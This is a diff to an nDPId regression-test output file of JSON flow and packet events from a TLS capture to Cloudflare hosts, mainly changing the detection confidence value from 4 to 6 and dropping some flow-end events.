@@ -29,32 +29,32 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm3AbsAL2HpAAAAALAC\/\/9wxQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1604822447311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447311,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybNKGfaqY21ET4AS\/\/\/K9AAAAgQFeAEBBAIBAwMK"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1604822447311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447311,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcmzAbtjbURPShn2q1AQEAD7jQAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1604822447325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447325,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybQgqbhsGMRIBoAS\/\/95lAAAAgQFeAEBBAIBAwMK"} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1604822447325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447325,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcm0AbsYxEgGIKm4bVAQEACqLQAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1604822447368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447368,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybVDiAdt8KRa8oAS\/\/+aXQAAAgQFeAEBBAIBAwMK"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1604822447369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447369,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm1AbvwpFryQ4gHblAQEADK9gAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1604822447370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447370,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybbraGnySz6LGIAS\/\/8FNwAAAgQFeAEBBAIBAwMK"} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1604822447370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447370,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm2AbtLPosY62hp81AQEAA10AAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1604822447373,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447373,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybcBQwC0AC9h6oAS\/\/\/M1wAAAgQFeAEBBAIBAwMK"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1604822447373,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447373,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm3AbsAL2HqAUMAtVAQEAD9cAAA"} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 